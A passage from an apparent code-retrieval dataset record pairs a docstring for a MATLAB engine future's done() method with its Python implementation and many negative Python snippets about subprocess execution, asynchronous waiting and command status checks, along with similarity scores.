self._logger.warning(\"Comparison run being cancelled.\")\n self._msg_logger.warning(run_analysis_view._text[\"log10\"])\n if hasattr(self, \"_off_thread\"):\n self._off_thread.cancel()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()" ]
[ "0.57483846", "0.5747091", "0.5745746", "0.5590403", "0.55467594", "0.55077934", "0.55016315", "0.5491056", "0.5442433", "0.5399497", "0.5271981", "0.5269121", "0.5266887", "0.5225791", "0.5185286", "0.5151515", "0.51362634", "0.5117819", "0.51172787", "0.50527465", "0.50269765", "0.49973252", "0.49814463", "0.49633318", "0.4950942", "0.4946667", "0.49385345", "0.49272752", "0.49211815", "0.48881978", "0.4880757", "0.4878895", "0.48717937", "0.48681948", "0.48548475", "0.48448855", "0.48357973", "0.48033077", "0.47974798", "0.47867578", "0.47867578", "0.47867578", "0.47867578", "0.4769865", "0.47693026", "0.47629997", "0.4758259", "0.47497755", "0.4746553", "0.47354287", "0.4720956", "0.47197285", "0.4718703", "0.47090772", "0.4708806", "0.4708806", "0.4708806", "0.47077197", "0.4694512", "0.46834463", "0.46833733", "0.46805838", "0.46788132", "0.4668407", "0.46570903", "0.46440527", "0.46404812", "0.46353808", "0.46268088", "0.4626343", "0.46168527", "0.46150848", "0.46077558", "0.46038023", "0.45977476", "0.45906678", "0.45784017", "0.4575565", "0.45731625", "0.45560032", "0.45550638", "0.45543268", "0.4534234", "0.45303383", "0.45243713", "0.45161754", "0.4507505", "0.44916636", "0.44910002", "0.4487735", "0.44864622", "0.44708556", "0.4467856", "0.44666004", "0.4465725", "0.44647697", "0.44618693", "0.44617087", "0.44617087", "0.44617087" ]
0.6059455
0
Obtain the completion status of the asynchronous invocation of a MATLAB command. Returns bool True if the execution is finished; False otherwise. It returns True even if there is an error generated from the MATLAB statement or it is cancelled. Raises RejectedExecutionError an error occurs if the engine is terminated.
def done(self): self.__validate_engine() return pythonengine.isDoneFEval(self._future)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def _execute(self):\n f = os.popen(self._com)\n if self._exec_time > 0:\n await asyncio.sleep_ms(self._exec_time)\n try:\n r = f.read()\n print(r)\n if self._expected_return is not None:\n if r == self._expected_return:\n return True\n return r\n else:\n return r\n except Exception as e:\n raise e\n finally:\n f.close()", "def _execute(self) -> Any:\n result = self.func(*self.args, **self.kwargs)\n if asyncio.iscoroutine(result):\n loop = asyncio.new_event_loop()\n coro_result = loop.run_until_complete(result)\n return coro_result\n return result", "async def _wait_execute(self, address, command, args, kw):\n conn = await self.acquire(command, args)\n try:\n return (await conn.execute(command, *args, **kw))\n finally:\n self.release(conn)", "def execute_success(self, *args, **kwargs):\n return 0, self.shell_output, None", "def succeeded(self):\n output = self.__call__()\n if output.succeeded:\n return output or True\n return False", "async def execute(self):\n eq = False\n for i in range(self._iterations):\n r = await self._execute()\n if r == self._expected_return:\n eq = True\n await asyncio.sleep_ms(self._iter_delay)\n return eq if eq is True else r", "def _await_operation_result(self):\n response = ReadMessage(self.connection.receive_message())\n result = response.read_uint8()\n self._assert_success(result)", "def executeCommand(commandtoexecute):\n try:\n _output = commands.getstatusoutput(commandtoexecute)\n except Exception as er:\n print \"not able to execute command\"\n return False\n return _output", "def result(self, timeout=None): \n self.__validate_engine()\n \n if self._retrieved:\n return self._result\n\n \"\"\"\n Following code is used to poll the Ctrl+C every second from keyboard in\n order to cancel a MATLAB function.\n \"\"\"\n\n try:\n result_ready = self.wait(timeout, pythonengine.waitForFEval)\n\n if not result_ready:\n raise TimeoutError(pythonengine.getMessage('MatlabFunctionTimeout'))\n\n self._result = pythonengine.getFEvalResult(self._future,self._nargout, None, out=self._out, err=self._err)\n self._retrieved = True\n return self._result\n\n except KeyboardInterrupt:\n self.cancel()\n if self.cancelled():\n print(pythonengine.getMessage('MatlabFunctionCancelled'))\n except:\n raise", "def _execute(self, cmd):\r\n stdout, stderr, return_code = self._remote_client.run_remote_cmd(cmd)\r\n if return_code:\r\n raise exceptions.ArgusError(\r\n \"Command {command!r} failed with \"\r\n \"return code {return_code!r}\"\r\n .format(command=cmd,\r\n return_code=return_code))\r\n return stdout, stderr", "def _retrieve_result(self, out):\n try:\n result = self.parallel._backend.retrieve_result_callback(out)\n outcome = dict(status=TASK_DONE, result=result)\n except BaseException as e:\n # Avoid keeping references to parallel in the error.\n e.__traceback__ = None\n outcome = dict(result=e, status=TASK_ERROR)\n\n self._register_outcome(outcome)\n return outcome['status'] != TASK_ERROR", "def __try_command(cmd, description):\n try:\n out = subprocess.check_output(cmd, stderr=subprocess.STDOUT);\n return (True, out.decode(\"utf-8\")) # success\n except subprocess.CalledProcessError as e:\n print(\"Error while {:s}, return code is non-zero ({:d})\".format(description, e.returncode))\n print(\"Command: {:s}\".format(\" \".join(e.cmd)))\n if e.output:\n print(\"Output: {:s}\".format(e.output.decode(\"utf-8\").strip()))\n\n return (False, None) # error", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "def execute_task(self, filename):\n stdin, stdout, stderr = self.ssh.exec_command(open(filename).read())\n if stdout.channel.recv_exit_status() == 0:\n return True, stdout.read().strip(), stderr.read().strip()\n else:\n return False, stdout.read().strip(), stderr.read().strip()", "def wait_for_execution_completion(self, execution_id, document_name=None):\n # Fetch ssm execution status\n status = self._get_execution_status(execution_id, document_name)\n\n # Wait for execution to be completed\n while status == 'InProgress' or status == 'Pending' or status == 'Cancelling' or status == 'Waiting':\n time.sleep(constants.sleep_time_secs)\n status = self._get_execution_status(execution_id, document_name)\n return status", "def _checkCommandStatus(self, lastCommand=False):\n p = self.spawnProc\n p.sendline('echo $?')\n regex = re.compile('^[0-9]+',re.M)\n p.expect(regex, 2)\n msg = '_checkCommandStatus : Execution of command FAILED'\n \tif lastCommand:\n \t msg = '_checkCommandStatus :Execution of command : \"%s\" FAILED' %lastCommand\n if p.after != '0' and p.after != '99':\n raise AssertionError(msg)", "def __execute(self, command):\n if not self.status:\n return 0\n\n stdin, stdout, stderr = self.__sshClientObj.exec_command(command)\n\n result = stderr.readlines()\n if len(result) > 1:\n return 0\n\n result = stdout.readlines()\n if len(result) > 1:\n return result[0][:-1]\n\n return 1", "def finished(self):\n if self._complete:\n raise ValueError('The operation has completed.')\n\n operation_name = (\n 'operations/%s/locations/%s/operations/%d' %\n (self._instance.name, self.location_id, self.op_id))\n request_pb = operations_pb2.GetOperationRequest(name=operation_name)\n # We expect a `google.longrunning.operations_pb2.Operation`.\n operation_pb = self._instance._client._operations_stub.GetOperation(\n request_pb, self._instance._client.timeout_seconds)\n\n if operation_pb.done:\n self._complete = True\n return True\n else:\n return False", "async def async_call(self, args=None, timeout=None):\n if args is None:\n args = []\n\n # Executing command with Tornado subprocess is possible only in main thread\n if threading.main_thread().ident != threading.get_ident():\n return self.call(args=args, timeout=timeout)\n\n all_args = [self.CMD if self.CMD is not None else cfg['tools.%s.cmd' % self.NAME]]\n all_args.extend(self.COMMON_ARGS)\n all_args.extend(args)\n cmd = ' '.join(all_args),\n log.debug('Executing: %s', cmd)\n\n if self._cancelled:\n raise Exception('Task was cancelled')\n task = process.Subprocess(all_args, stderr=process.Subprocess.STREAM, stdout=process.Subprocess.STREAM)\n self.proc = task.proc\n\n coroutine = gen.multi([task.wait_for_exit(raise_error=False),\n task.stdout.read_until_close(),\n task.stderr.read_until_close()])\n\n if not timeout:\n return_code, stdout, stderr = await coroutine\n else:\n try:\n return_code, stdout, stderr = await gen.with_timeout(timedelta(seconds=timeout), coroutine)\n except gen.TimeoutError as exception:\n log.exception(\"Command %s timed out after %s while executing %s\", self.NAME, timeout, cmd)\n task.proc.kill()\n raise exception\n\n self.proc = None\n\n if return_code != 0:\n log.warning(\"Command '%s' failed wit exit code: %s\", cmd, return_code)\n log.debug(\"Command '%s':\\nSTDOUT:\\n%s\\nSTDERR:\\n%s\", cmd, stdout, stderr)\n if self.RAISE_ERROR:\n raise subprocess.CalledProcessError(return_code, cmd)\n\n return self.parser.parse(stdout.decode('utf-8'), stderr.decode('utf-8'))", "def wait_for_command_execution(self, timeout=None, check_fun=None):\n if check_fun is None:\n def check_fun2(buf, whole_data):\n # TODO: expose via logging config entry\n if self.verbose_logger is not None:\n self.verbose_logger.debug(\"expecting '%s', got: '%s'\", self.shell_prompt, buf)\n\n return self.re_shell_prompt.search(whole_data)\n\n check_fun = check_fun2\n try:\n res = self.process_output(\n NetUtil.wait_for_socket_result(self.sock,\n check_fun,\n read_buf_size=SOCKET_READ_BUF_SIZE,\n timeout=timeout\n )\n )\n except NetUtil.Timeout as e:\n # netstat_uds = run_shell(\"netstat -ape -A unix\")\n # open_fds = run_shell('ls -l /proc/%s/fd/' % os.getpid())\n # lsof = run_shell('lsof -U')\n # debug:\n\n # Active Unix Domain Sockets:\n # %s.\n # Open file handles (Unix):\n # %s\n # lsof:\n # %s\n # % (netstat_uds, open_fds, lsof))\n # log exception to node log\n if self.brief_logger:\n self.brief_logger.exception(e)\n\n raise\n return res", "def _execute(self, command):\n _, stdout, stderr = self.ssh_client.exec_command(command)\n exit_code = stdout.channel.recv_exit_status()\n stdout = stdout.read().decode().strip()\n stderr = stderr.read().decode().strip()\n\n return exit_code, stdout, stderr", "def _exec_cmd(self, cmd, ignore_status=False, timeout=DEFAULT_ADB_TIMEOUT):\n result = job.run(cmd, ignore_status=True, timeout=timeout)\n ret, out, err = result.exit_status, result.stdout, result.stderr\n\n logging.debug(\"cmd: %s, stdout: %s, stderr: %s, ret: %s\", cmd, out,\n err, ret)\n if \"Result: Parcel\" in out:\n return parsing_parcel_output(out)\n if ignore_status:\n return out or err\n if ret == 1 and DEVICE_NOT_FOUND_REGEX.match(err):\n raise AdbError(cmd=cmd, stdout=out, stderr=err, ret_code=ret)\n else:\n return out", "def get(self):\n if not self.finished():\n self.wait()\n return self._result", "def evaluateCommand(self, cmd):\n if cmd.rc != 0:\n return FAILURE\n if self.errors:\n\t if halt_on_lintian_error:\n\t return FAILURE\n\t else:\n\t\treturn WARNINGS\n if self.warnings:\n return WARNINGS\n return SUCCESS", "async def wait(self):\n if self.poll() is None:\n await wait_child_exiting(self)\n self._proc.wait()\n else:\n await _core.checkpoint()\n return self.returncode", "def isfailure(self):\n\n return self.proc.returncode != 0", "def exec_command(self, cmd):\n err_buf = (ctypes.c_char * self.MAX_BUF_SIZE)()\n res = self._dll.JLINKARM_ExecCommand(cmd.encode(), err_buf, self.MAX_BUF_SIZE)\n err_buf = ctypes.string_at(err_buf).decode()\n\n if len(err_buf) > 0:\n # This is how they check for error in the documentation, so check\n # this way as well.\n raise errors.JLinkException(err_buf.strip())\n\n return res", "def execute(cmd, path):\n oldPath = os.getcwd()\n os.chdir(path)\n\n exitcode, output = subprocess.getstatusoutput(cmd)\n\n os.chdir(oldPath)\n\n ok = not exitcode\n\n return ok, output", "def done(self) -> bool:\n\n if len(self.required_tasks) == 0:\n return True\n\n task_query = self.storage_socket.get_procedures(\n id=list(self.required_tasks.values()), include=[\"status\", \"error\"]\n )\n\n status_values = set(x[\"status\"] for x in task_query[\"data\"])\n if status_values == {\"COMPLETE\"}:\n return True\n\n elif \"ERROR\" in status_values:\n for x in task_query[\"data\"]:\n if x[\"status\"] != \"ERROR\":\n continue\n\n self.logger.debug(\"Error in service compute as follows:\")\n tasks = self.storage_socket.get_queue()[\"data\"]\n for x in tasks:\n if \"error\" not in x:\n continue\n\n self.logger.debug(x[\"error\"][\"error_message\"])\n\n raise KeyError(\"All tasks did not execute successfully.\")\n else:\n return False", "async def checked_run(cmd, env=None):\n\n # Start the subprocess.\n logging.info('Running: %s', await expand_cmd_str(cmd))\n with logged_timer('{} finished'.format(get_cmd_name(cmd))):\n p = await asyncio.create_subprocess_exec(\n *cmd, env=env,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.STDOUT)\n\n # Stream output from the process stdout.\n lines = []\n while True:\n line = await p.stdout.readline()\n if not line:\n break\n line = line.decode()[:-1]\n lines.append(line)\n logging.info(line)\n\n # Wait for the process to finish, check it was successful & build stdout.\n await p.wait()\n output = '\\n'.join(lines)[:-1]\n if p.returncode:\n raise RuntimeError('Return code {} from process: {}\\n{}'.format(\n p.returncode, await expand_cmd_str(cmd), output))\n\n return output", "def cmd_wait(con, run_cmd):\n # May take up to 5 minutes\n sleep(5)\n ret = False\n for _ in range(25):\n try:\n result = con.run(run_cmd, hide=True)\n if result.return_code == 0:\n ret = True\n break\n except (ConnectionError, NoValidConnectionsError):\n sleep(10)\n\n return ret", "def parallelize_isfunctionfinished(parallelizehandle):\r\n\r\n \r\n try:\r\n if parallelize_info_dict[parallelizehandle]['runninglist']:\r\n return False\r\n else:\r\n return True\r\n except KeyError:\r\n raise ParallelizeError(\"Cannot get status for the parallel execution of a non-existent handle:\"+str(parallelizehandle))", "def is_task_done(self):\r\n is_task_done = c_bool32()\r\n\r\n cfunc = lib_importer.windll.DAQmxIsTaskDone\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [\r\n lib_importer.task_handle, ctypes.POINTER(c_bool32)]\r\n\r\n error_code = cfunc(\r\n self._handle, ctypes.byref(is_task_done))\r\n check_for_error(error_code)\r\n\r\n return is_task_done.value", "def result(self):\n with self.__lock:\n assert(self.__complete)\n return self.__result", "def poll(self):\n if self._worker is None:\n self.returncode = None\n return self.returncode\n elif self._worker.is_alive():\n self.returncode = None\n return self.returncode\n else:\n self.returncode = self._worker.state.return_value\n return self.returncode", "def _query_state_code(command):\n _LOGGER.info('Running state command: %s', command)\n return subprocess.call(command, shell=True) == 0", "def execute(self, *args, **kwargs):\n\n if 'timeout' not in kwargs:\n kwargs['timeout'] = self.worker.get('timeout', 60)\n\n self.logger.info(\"Running command %s\", args)\n result = sp.check_call(args, **kwargs)\n self.logger.info(\"Command Finished\")\n return result", "def execute_command_async(self, command):\n raise NotImplementedError", "def _exec_command(command):\n\n log(\"Run command for '%s'\" % command)\n p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n (output, err) = p.communicate()\n p_status = p.wait()\n return p_status, output", "def is_async(self) -> bool:", "def execute(self, condition=None, timeout=90):\n if not self.stopped:\n if timeout:\n def timeout_func():\n try:\n raise Exception('Async operation timed out after {} seconds'.format(timeout))\n except:\n self.stop(failure=sys.exc_info())\n\n self.io_loop.add_timeout(time.time() + timeout, timeout_func)\n while True:\n self.running = True\n with NullContext():\n # Wipe out the StackContext that was established in\n # self.run() so that all callbacks executed inside the\n # IOLoop will re-run it.\n self.io_loop.start()\n if (self.failure is not None or\n condition is None or condition()):\n break\n assert self.stopped\n self.stopped = False\n if self.failure is not None:\n raise self.failure[0], self.failure[1], self.failure[2]\n result = self.return_value\n self.return_value = None\n return result", "def status(self):\n with self.__lock:\n assert(self.__complete)\n return self.__status", "def exec_command_string(command_str):\n print(command_str)\n (status, result) = getstatusoutput(command_str)\n return status, result", "async def _run_cmd(self, cmd, timeout=5):\n try:\n self._flush_buffer()\n self.pexpect_child.sendline(cmd)\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n stdout = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else \"\"\n self.pexpect_child.sendline(\"echo $?\")\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n exit_status = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else -1\n try:\n exit_status = int(exit_status)\n except ValueError:\n exit_status = -1\n return exit_status, stdout\n except Exception as e:\n self.applog.exception(\"Exception occured --> _run_command\", exc_info=e)\n raise", "def _execute(self, command):\n \"\"\"\n Confirm the command was correctly echoed back and then ask for\n its return code\n \"\"\"\n self.telnet_client.write((command + \"\\r\\n\").encode())\n resp = self.telnet_client.read_until((command + \"\\r\\n\").encode())\n while True:\n resp = self.telnet_client.read_until(self.prompt.encode())\n if resp is not None:\n break\n\n stdout = resp.decode()\n stderr = \"\"\n self.telnet_client.write(\"echo $?\\r\\n\".encode())\n _, match, _ = self.telnet_client.expect([re.compile(br'(\\d+)')],\n TelnetControl.TELNET_TIMEOUT)\n exit_code = int(match.group(1).decode())\n\n if exit_code != 0:\n stderr = resp.decode()\n return exit_code, stdout, stderr", "def _subprocess(cmd):\n\n log.debug('Running: \"%s\"', \" \".join(cmd))\n try:\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n ret = salt.utils.stringutils.to_unicode(proc.communicate()[0]).strip()\n retcode = proc.wait()\n\n if ret:\n return ret\n elif retcode != 1:\n return True\n else:\n return False\n except OSError as err:\n log.error(err)\n return False", "def _exec_cmd(cmd, stdout=None, stderr=None):\n rc = 0\n kwargs = {}\n if stdout is not None:\n kwargs[\"stdout\"] = stdout\n if stderr is not None:\n kwargs[\"stderr\"] = stderr\n try:\n subprocess.check_call(cmd, **kwargs)\n except CalledProcessError as e:\n LOG.error(\"[return code: %s] %s\", e.returncode, e)\n rc = e.returncode\n return rc", "def has_finished(self):\n return hasattr(self, '_result') or hasattr(self, '_result_exc')", "def async_check(word):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(async_cli(word))", "def _wait_for_results(self) -> RemoteCallableResult:\n if (\n self.subscriber is None or\n self.started is None or\n self.process is None\n ):\n raise dbt.exceptions.InternalException(\n '_wait_for_results() called before handle()'\n )\n\n try:\n msg = self.subscriber.dispatch_until_exit(\n started=self.started,\n timeout=self.timeout,\n )\n except dbt.exceptions.Exception as exc:\n raise dbt_error(exc)\n except Exception as exc:\n raise server_error(exc)\n if isinstance(msg, QueueErrorMessage):\n raise RPCException.from_error(msg.error)\n elif isinstance(msg, QueueTimeoutMessage):\n if not self._single_threaded:\n self.process.terminate()\n raise timeout_error(self.timeout)\n elif isinstance(msg, QueueResultMessage):\n return msg.result\n else:\n raise dbt.exceptions.InternalException(\n 'Invalid message type {} (result={})'.format(msg)\n )", "def status(self):\n if not self._last_command:\n return None\n return self._last_command.status()", "def run(self):\n try:\n self.cmd_output = \\\n subprocess.run(self.cmd, \\\n stdout=subprocess.PIPE, \\\n stderr=subprocess.PIPE, \\\n shell=True, env=ENVS, \\\n check=True).stdout.decode('utf-8')\n return True\n except subprocess.CalledProcessError as e:\n self.cmd_output = e.stderr.decode('utf-8')\n return False", "def execute(self, command, *args, **kw):\n conn, address = self.get_connection(command, args)\n if conn is not None:\n fut = conn.execute(command, *args, **kw)\n return self._check_result(fut, command, args, kw)\n else:\n coro = self._wait_execute(address, command, args, kw)\n return self._check_result(coro, command, args, kw)", "def wait_for_func_status(self, result):\n try:\n for res in self:\n if result == res:\n return True\n\n except self.timeout_exc_cls:\n log.error(\n f\"({self.func.__name__}) return incorrect status after timeout\"\n )\n return False", "def asyncgetresult(self,server_,port_,token_): # 3\n res,resargs = self.__obj.asyncgetresult(server_,port_,token_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n _respavailable_return_value,_resp_return_value,_trm_return_value = resargs\n _trm_return_value = rescode(_trm_return_value)\n _resp_return_value = rescode(_resp_return_value)\n return _respavailable_return_value,_resp_return_value,_trm_return_value", "def check_output(command):\n process = Popen(command, shell=True, stdout=PIPE)\n output, err = process.communicate()\n if process.returncode == 0: # success\n return output\n else:\n raise RuntimeError(\"Command {0} running unsuccessfully\".format(command))", "def ended(self):\n return self.succeeded() or self.failed()", "def is_finished(self, remotely=True, ssh='ssh'):\n from subprocess import check_output, CalledProcessError\n from os.path import join\n\n remotefile = self.resultfile\n\n ssh = getattr(self, 'ssh', ssh)\n\n if remotely:\n remotefile = join(self.remote_directory, remotefile)\n else:\n remotefile = join(self.local_directory, remotefile)\n try:\n if not remotely or self.no_ssh:\n check_output([\"ls\", remotefile])\n else:\n check_output([ssh, self.url, \"ls\", remotefile])\n return True\n except CalledProcessError:\n return False", "def raw_check_complete(self):\n check_complete_response = self._raw_execute(\"status\", {\"job_id\": self.job_id})\n return check_complete_response", "def _check_step_completed(self, i):\n\n module, _ = self._get_command_config(i)\n status = self._get_status_obj()\n submitted = self._check_jobs_submitted(status, module)\n if not submitted:\n return_code = 1\n else:\n return_code = self._get_module_return_code(status, module)\n\n return return_code", "def _check_if_completed(self):\n if self.completed:\n self._result = self._complete()\n elif self.timed_out:\n logger.debug(f\"Use case {type(self.use_case).__name__} \"\n f\"timed out after taking more than \"\n f\"{self.use_case.timeout} seconds.\")\n self._result = self._complete(timed_out=True)\n self._execution_counter += 1", "def os_exec(self, cmd, **kwargs):\n pdb.set_trace()\n try:\n retv = os.system(cmd)\n print(\"Got retv: {}\".format(retv))\n if retv != 0:\n print(\"\\t{} |{}| Got incorrect retv {}!\".format(Timer.UNKN,self.tinfo['name'], retv))\n return\n else:\n print(\"\\t{} |{}| Executed system command successfully.\".format(Timer.OK, self.tinfo['name']))\n return True\n\n except PermissionError as e:\n print(\"{} Permission error in os_exec.\".format(Timer.FAIL, e))\n return False\n except Exception as e:\n print(\"{} Caught exception in os_exec: {}\".format(Timer.FAIL, e))\n return False", "def wait_process_completion(remote_command_executor, pid):\n logging.info(\"Waiting for performance test to complete\")\n command = f\"\"\"\n ps --pid {pid} > /dev/null\n [ \"$?\" -ne 0 ] && echo \"COMPLETE\" || echo \"RUNNING\"\n \"\"\"\n result = remote_command_executor.run_remote_command(command)\n if result.stdout == \"RUNNING\":\n raise Exception(\"The process is still running\")\n else:\n return result.stdout.strip()", "def returncode(self) -> Optional[Union[int, str]]:\n return self.proc.poll() # type: ignore", "def run(self, cmd, timeout=30, exitcode=True):\n result = False\n self.write(cmd)\n stdout = self.stdout_read(timeout)\n\n if exitcode:\n self.write(\"echo $?\".format(cmd))\n rc = self.stdout_read(timeout)\n if re.search(r\"\\r\\n0\\r\\n\", rc, re.MULTILINE):\n result = True\n elif stdout is not None and stdout != \"\":\n result = True\n return result, stdout", "def getResult(self):\n return self.ok", "def execute_cmd(cmd, cwd=None, timeout=5):\n p = subprocess.Popen(cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n p.wait(timeout=timeout)\n except subprocess.TimeoutExpired:\n return None\n else:\n stdout, stderr = p.stdout.read(), p.stderr.read()\n stdout, stderr = stdout.decode('utf-8', errors='ignore'), stderr.decode('utf-8', errors='ignore')\n if p.returncode:\n raise ExecuteError('Error running command {}: The error code {} has returned. Stderr: {}'.format(\n ' '.join(cmd), p.returncode, stderr\n ))\n else:\n return stdout, stderr", "def get(self, retry_on_failure=True):\n done = threading.Event()\n\n api.cancel_callbacks.add(done.set)\n self.on_result(lambda _result: done.set())\n done.wait()\n api.cancel_callbacks.discard(done.set)\n\n if api.has_cancel_request():\n if self._result is self._NOT_SET:\n self.result = api.ExecutionCancelled()\n raise self.result\n\n ctx = self.task.workflow_context\n if not ctx.internal.graph_mode:\n ctx.internal.task_graph.remove_task(self.task)\n\n if self.task.get_state() in (TASK_FAILED, TASK_RESCHEDULED):\n handler_result = self.task.handle_task_terminated()\n if handler_result.retried_task and retry_on_failure:\n handler_result.retried_task.apply_async()\n return handler_result.retried_task.async_result.get()\n else:\n raise self.result\n return self._result", "async def execute_system(self):\n return True", "def execute(self, *args, **kwargs):\n ret = self.method(*args, **kwargs)\n if isinstance(ret, asyncio.Future) or inspect.isgenerator(ret):\n # In that case,\n # run the asyncio coroutine in a dedicated event loop\n # of the process pool executure\n\n @asyncio.coroutine\n def routine(method, future):\n ret = yield from method\n future.set_result(ret)\n\n future = asyncio.Future()\n old_loop = asyncio.get_event_loop()\n try:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.Task(routine(ret, future)))\n ret = future.result()\n finally:\n asyncio.set_event_loop(old_loop)\n loop.close()\n\n return ret", "async def checked_run(*cmd):\n\n # Start the subprocess.\n logging.info('Running: %s', expand_cmd_str(cmd))\n with logged_timer('{} finished'.format(get_cmd_name(cmd))):\n p = await asyncio.create_subprocess_exec(\n *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.STDOUT)\n\n # Stream output from the process stdout.\n chunks = []\n while True:\n chunk = await p.stdout.read(16 * 1024)\n if not chunk:\n break\n chunks.append(chunk)\n\n # Wait for the process to finish, check it was successful & build stdout.\n await p.wait()\n stdout = b''.join(chunks).decode()[:-1]\n if p.returncode:\n raise RuntimeError('Return code {} from process: {}\\n{}'.format(\n p.returncode, expand_cmd_str(cmd), stdout))\n\n return stdout", "def get_result(self):\n if not self._complete.is_set():\n logger.warning(\"Aborting attempt to retrieve result from a LongRunningTask that is \"\n \"still running\")\n return None\n if self.err:\n logger.debug(\"Error caught in thread\")\n self._config.set_cursor_default(widget=self._widget)\n raise self.err[1].with_traceback(self.err[2])\n\n logger.debug(\"Getting result from thread\")\n retval = self._queue.get()\n logger.debug(\"Got result from thread\")\n self._config.set_cursor_default(widget=self._widget)\n return retval", "def IsCompleted(self) -> bool:", "def IsCompleted(self) -> bool:", "def IsCompleted(self) -> bool:", "def get_completionStatus(self):\n val = self.resource.get_cdmi_sys_meta().get(\"cdmi_completionStatus\",\n \"Complete\")\n return val", "def run_cmd(cls, cmd):\n cmd_rc = False\n cmd_result = b'' # Stores bytes\n\n if cmd == \"\" or cmd is None:\n cmd_rc = False\n else:\n # shell=True means cmd param contains a regular cmd string\n shell = shl.Popen(cmd, shell=True,\n stdin=shl.PIPE, stdout=shl.PIPE, stderr=shl.STDOUT)\n cmd_result, _ = shell.communicate()\n if 'failure'.encode('utf-8') in cmd_result or 'fatal'.encode('utf-8') in cmd_result:\n cmd_rc = False\n else:\n cmd_rc = True\n return (cmd_rc, cmd_result)", "def call_command(command: List[str], shell: bool = False, **kwargs) -> bool:\n log_command(command)\n exit_code = subprocess.call(_format_command(command, shell), shell=shell, **kwargs)\n logger.debug(\"Command exit code: {}\".format(exit_code))\n\n return not bool(exit_code)", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def check_execution(programm: List[str]):\n line_counter = 0\n list_of_executed_lines = [0]\n accumulator_value = {'act_val': 0}\n last_instruction = len(programm)\n while True:\n (command, value) = programm[line_counter]\n if command == 'nop':\n line_counter = nop(line_counter, value)\n if command == 'jmp':\n line_counter = jump(line_counter, value)\n if command == 'acc':\n line_counter = acc(line_counter, accumulator_value, value)\n if line_counter in list_of_executed_lines:\n print(\n f'Found first line visted twice! {line_counter} after {len(list_of_executed_lines)} operations')\n print(f'Accumulator value is {accumulator_value[\"act_val\"]}')\n return False, accumulator_value\n else:\n list_of_executed_lines.append(line_counter)\n if line_counter == last_instruction:\n print('Found end of programm!')\n return True, accumulator_value", "def get_result(self, wait=-1):\n\n if not self.is_done():\n\n if wait >= 0:\n self.thread.join(wait)\n\n else:\n raise Asynchronous.NotYetDoneException(\n 'the call has not yet completed its task'\n )\n\n if self.result is None:\n self.result = self.queue.get()\n\n return self.result", "def done(self):\n future = self.future\n\n if future:\n result = future.done()\n return result", "def call(self):\n\n process = subprocess.Popen(self._cmd, stdout=self._stdout, stderr=self._stderr,\n shell=isinstance(self._cmd, basestring), env=self._env, cwd=self._cwd)\n returnData = process.communicate()\n\n return ProcessResult(process.returncode, returnData[0], returnData[1])", "def _get_execution_status(self, execution_id, document_name=None):\n execution = self.ssm_client.get_automation_execution(\n AutomationExecutionId=execution_id\n )\n # TODO(semiond): we can remove document name as parameter, can take it by execution id.\n document_name = document_name if document_name else execution['AutomationExecution']['DocumentName']\n step_executions = execution['AutomationExecution']['StepExecutions']\n step = self._get_step_by_status(step_executions, 'InProgress')\n if step:\n step_name = step['StepName']\n self.logger.info(f'Waiting SSM document step [{document_name}>{step_name}] to be completed: '\n f'{self.get_execution_step_url(execution_id, step_name, step_executions)}')\n return execution['AutomationExecution']['AutomationExecutionStatus']", "def _exec_cmd(self, cmd):\n proc = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n (out, err) = proc.communicate()\n ret = proc.returncode\n logging.debug('cmd: %s, stdout: %s, stderr: %s, ret: %s', cmd, out,\n err, ret)\n if ret == 0:\n return out\n else:\n raise AdbError(cmd=cmd, stdout=out, stderr=err, ret_code=ret)", "def _is_job_finished(self, job_id):\n complete, rc, status, result, task = False, 0, None, None, None\n job = self.get_job_by_id(job_id)\n if job:\n status = job['status']\n try:\n result, task = job['result'], job['task']\n except KeyError:\n pass\n if status.lower() == SUCCEEDED:\n complete = True\n elif status.lower() in INCOMPLETE_LIST:\n complete = False\n else:\n rc, complete = -1, True\n return complete, result, rc, status, task", "def result(self):\n if not self.ready:\n self.compute()\n return self.ready", "def proc_exec_async(cmd):\n\n envoy.connect(cmd)\n return None", "def Subprocess(self, cmd):\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = p.communicate()\n return (p.returncode, stdout, stderr)", "def success(self):\n return self.status == 0 and self.stdout", "def wait_for(self, operation, timeout=5):\n \n # TODO: Remove this check when the Scheduler no longer useses deferred's\n if isinstance(operation, Deferred):\n operation.addCallbacks(self.quit_with_result, self.quit_with_error)\n self.wait(timeout)\n\n if hasattr(operation.result, 'raiseException'):\n operation.result.raiseException()\n else:\n operation.add_observer(self, 'is_finished', 0, self.quit)\n self.queue.add_operation(operation)\n \n self.wait(timeout)\n \n # Both deferred or an operation will return here\n return operation.result", "def value(self):\n self.event.wait()\n if not self.exc:\n return self.result\n else:\n exc = self.exc\n if not self.exc:\n exc = StandardError('no result')\n raise exc", "def asyncgetresult(self,server_,port_,token_):\n if isinstance(server_,unicode):\n server_ = 